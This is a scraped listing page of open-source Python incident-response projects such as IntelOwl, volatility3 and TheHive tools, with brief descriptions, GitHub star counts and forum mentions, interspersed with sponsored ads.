Python incident-response

Open-source Python projects categorized as incident-response

Top 22 Python incident-response Projects

  • IntelOwl

    Intel Owl: analyze files, domains, IPs in multiple ways from a single API at scale

    Project mention: To GSoC and beyond... | | 2022-09-26

    Allowed bulk analysis of files as well as observables, leading to a more efficient workflow for IntelOwl users. #1032

  • volatility3

    Volatility 3.0 development

    Project mention: Volatility 3 2.4.1 - New Linux and Windows plugins | | 2023-04-22
  • CodiumAI

    TestGPT | Generating meaningful tests for busy devs. Get non-trivial tests (and trivial, too!) suggested right inside your IDE, so you can code smart, create more value, and stay confident when you push.

  • beagle

    Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (by yampelo)

  • Bashfuscator

    A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.

    Project mention: Please be gentle | | 2022-09-15

    Try and figure out what this does... I used a tool I wrote years ago called Bashfuscator to create it:

  • Incident-Playbook

    GOAL: Incident Response Playbooks Mapped to MITRE Attack Tactics and Techniques. [Contributors Friendly]

    Project mention: Cyber Playbooks | | 2022-06-29
  • APT-Hunter

    APT-Hunter is Threat Hunting tool for windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspicious activity

    Project mention: APT-Hunter: APT-Hunter is Threat Hunting tool for Windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspicious activity | | 2023-05-07
  • ThePhish

    ThePhish: an automated phishing email analysis tool

    Project mention: How do you deal with phising emails at your company? | | 2023-05-14
  • InfluxDB

    Access the most powerful time series database as a service. Ingest, store, & analyze all types of time series data in a fully-managed, purpose-built database. Keep data forever with low-cost storage and superior data compression.

  • intelmq

    IntelMQ is a solution for IT security teams for collecting and processing security feeds using a message queuing protocol.

  • CyberThreatHunting

    A collection of resources for Threat Hunters - Sponsored by Falcon Guard

  • Watcher

    Watcher - Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS. (by Felix83000)

  • atc-react

    A knowledge base of actionable Incident Response techniques

    Project mention: Mitre deTTECT | | 2023-03-31

    Someone knows something similar to M.Att&ck for incident response? I found this: looks good but seems pretty dead, :?

  • dfirtrack

    DFIRTrack - The Incident Response Tracking Application

    Project mention: Report tips and note taking tips | | 2023-03-21

    DFIRTrack - IR tracking application

  • TheHiveDocs

    Documentation of TheHive

  • misp-taxonomies

    Taxonomies used in MISP taxonomy system and can be used by other information sharing tool.

    Project mention: Licensing API response data | | 2022-06-20

    Some repositories are licensed without having any code: Example with datasets: Example with md documentation:

  • TheHive4py

    Python API Client for TheHive

    Project mention: ThePhish: an automated phishing email analysis tool - A new version will come when the Python API for TheHive 5 becomes stable, so stay tuned! | | 2023-04-22

    Waiting for these guys to complete the API and related documentation:

  • assisted-log-enabler-for-aws

    Assisted Log Enabler for AWS - Find AWS resources that are not logging, and turn them on.

  • kc7

    A cybersecurity game in Azure Data Explorer

    Project mention: Kc7 – A cybersecurity game in Azure Data Explorer | | 2022-09-26
  • evtx-hunter

    evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files.

  • mediator

    An extensible, end-to-end encrypted reverse shell that works across networks without port forwarding. (by lawndoc)

  • Project mention: Playbook/Guide for responding to specific incident | | 2023-05-02
  • INDXRipper

    Carve file metadata from NTFS index ($I30) attributes

  • Simple-Live-Data-Collection

    Simple Live Data Collection Tool


    ONLYOFFICE Docs — document collaboration in your environment. Powerful document editing and collaboration in your app or environment. Ultimate security, API and 30+ ready connectors, SaaS or on-premises

NOTE: The open source projects on this list are ordered by number of github stars. The number of mentions indicates repo mentiontions in the last 12 Months or since we started tracking (Dec 2020). The latest post mention was on 2023-05-14.

Python incident-response related posts


What are some of the best open-source incident-response projects in Python? This list will help you:

Project Stars
1 IntelOwl 2,767
2 volatility3 1,536
3 beagle 1,209
4 Bashfuscator 1,159
5 Incident-Playbook 1,060
6 APT-Hunter 948
7 ThePhish 885
8 intelmq 824
9 CyberThreatHunting 717
10 Watcher 714
11 atc-react 521
12 dfirtrack 424
13 TheHiveDocs 385
14 misp-taxonomies 229
15 TheHive4py 193
16 assisted-log-enabler-for-aws 171
17 kc7 137
18 evtx-hunter 123
19 mediator 91
20 aws-incident-response-playbooks-workshop 39
21 INDXRipper 37
22 Simple-Live-Data-Collection 21
Write Clean Python Code. Always.
Sonar helps you commit clean code every time. With over 225 unique rules to find Python bugs, code smells & vulnerabilities, Sonar finds the issues while you focus on the work.